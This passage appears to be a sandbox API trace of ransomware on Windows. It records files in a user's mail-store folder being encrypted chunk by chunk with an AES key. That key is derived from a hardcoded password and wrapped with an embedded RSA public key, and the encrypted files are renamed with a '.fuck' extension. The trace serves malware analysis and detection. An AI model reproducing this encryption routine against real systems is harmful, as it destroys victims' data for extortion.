nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.543] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.543] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.543] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.543] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.543] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.543] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.978] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol"), bFailIfExists=0) returned 1 [0243.513] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol", dwFileAttributes=0x200) returned 1 [0243.514] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol.gsg")) returned 1 [0243.515] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol.fuck")) returned 1 [0243.516] CryptDestroyHash (hHash=0x28e8078) returned 1 [0243.516] CryptDestroyKey (hKey=0x28e7df8) returned 1 [0243.516] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0243.516] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0243.516] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0243.516] GetLastError () returned 0x0 [0243.517] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk")) returned 0x20 [0243.517] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk", dwFileAttributes=0x80) returned 1 [0243.518] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0243.518] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0243.518] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk.gsg", dwFileAttributes=0x2) returned 1 [0243.519] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0243.522] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0243.522] lstrlenA (lpString="XWfzHtQHomNVJTpHdYelOBaqzMlQm") returned 29 [0243.522] CryptHashData (hHash=0x28e8078, pbData=0x2857470, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0243.522] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8078, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7df8) returned 1 [0243.522] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0243.522] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0243.522] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f51c0) returned 1 [0243.522] CryptImportPublicKeyInfo (in: hCryptProv=0x28f51c0, dwCertEncodingType=0x1, pInfo=0x2936480*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29364b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29364b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bee18) returned 1 [0243.523] CryptEncrypt (in: hKey=0x28bee18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0243.523] CryptEncrypt (in: hKey=0x28bee18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5710*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f5710*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0243.523] WriteFile (in: hFile=0x5d3c, lpBuffer=0x28f5710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f5710*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0243.524] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.565] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.566] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.567] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.567] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.567] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.567] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.567] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.568] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.568] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.568] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.568] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.568] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0243.568] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x80, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x90) returned 1 [0243.569] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x90, lpOverlapped=0x0) returned 1 [0243.569] CloseHandle (hObject=0x5d44) returned 1 [0243.569] CloseHandle (hObject=0x5d3c) returned 1 [0243.571] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk"), bFailIfExists=0) returned 1 [0243.574] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk", dwFileAttributes=0x0) returned 1 [0243.574] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk.gsg")) returned 1 [0243.575] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.chk.fuck")) returned 1 [0243.576] CryptDestroyHash (hHash=0x28e8078) returned 1 [0243.576] CryptDestroyKey (hKey=0x28e7df8) returned 1 [0243.576] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0243.576] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0243.576] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0243.576] GetLastError () returned 0x0 [0243.577] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log")) returned 0x20 [0243.577] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log", dwFileAttributes=0x80) returned 1 [0243.578] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0243.578] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0243.578] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log.gsg", dwFileAttributes=0x2) returned 1 [0243.579] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0243.582] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0243.582] lstrlenA (lpString="XWfzHtQHomNVJTpHdYelOBaqzMlQm") returned 29 [0243.582] CryptHashData (hHash=0x28e7df8, pbData=0x28574c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0243.582] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e8078) returned 1 [0243.582] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0243.582] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0243.582] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f5468) returned 1 [0243.583] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5468, dwCertEncodingType=0x1, pInfo=0x2936620*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936650*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936658*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28467e0) returned 1 [0243.583] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0243.583] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5248*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f5248*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0243.583] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f5248*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f5248*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0243.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.589] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.589] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.598] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.598] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, 